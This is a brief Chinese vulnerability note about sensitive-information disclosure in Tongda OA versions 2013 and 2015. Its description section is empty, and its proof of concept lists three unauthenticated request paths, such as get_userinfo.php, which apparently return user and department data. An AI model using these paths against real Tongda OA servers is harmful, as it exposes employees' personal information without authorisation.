通达oa ⻚面敏感信息泄露

一、漏洞简介

二、漏洞影响

2013、2015版本

三、复现过程

POC:

http://0-sec.org/general/get_userinfo.php
http://0-sec.org/general/ipanel/user/query.php
http://0-sec.org/general/info/dept